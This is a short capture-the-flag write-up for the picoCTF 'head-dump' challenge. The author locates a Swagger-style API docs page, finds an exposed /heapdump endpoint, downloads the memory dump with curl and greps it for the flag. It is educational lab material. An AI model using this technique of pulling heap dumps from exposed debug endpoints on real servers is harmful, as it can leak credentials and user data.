Christopher Ferrari

picoCTF: head-dump — Writeup

Published on June 4, 2025

Challenge: picoCTF: head-dump

Difficulty: Easy

This challenge involved a web app with an embedded flag hidden in a server memory dump. The description made a direct reference to "API Documentation," which wasn’t just fluff — it was a roadmap.

Initial Analysis

I opened the site and skipped the guesswork. Used browser dev tools and searched the source for patterns like /api, /docs, or anything that hinted at internal routing.

My Theory

They called out API documentation in the challenge. That means they *wanted* me to find the docs. If it's a modern web app, there's probably a Swagger-style endpoint revealing all routes — including a potential heap/memory dump endpoint.

Discovery Process

Searched the source with Ctrl+F. Hit on a goldmine:

/api-docs/#/

That link took me to a full API documentation interface. In it, I found:

GET /heapdump

No need to guess. This route was literally handed to me. I hit it directly:

bashcurl http://<target>/heapdump

Got a raw memory dump file. Saved it and extracted readable text:

bashstrings heapdump > parsed.txt
grep picoCTF parsed.txt

Found the flag hidden in the dump.

Flag: picoCTF{...}

Key Takeaway

The API doc mention was the entire playbook. Don’t ignore those “details” in challenge descriptions — they’re often the answer key. Go to the source, look at what the devs left behind, and always assume structure over randomness. Systematic > blind guessing.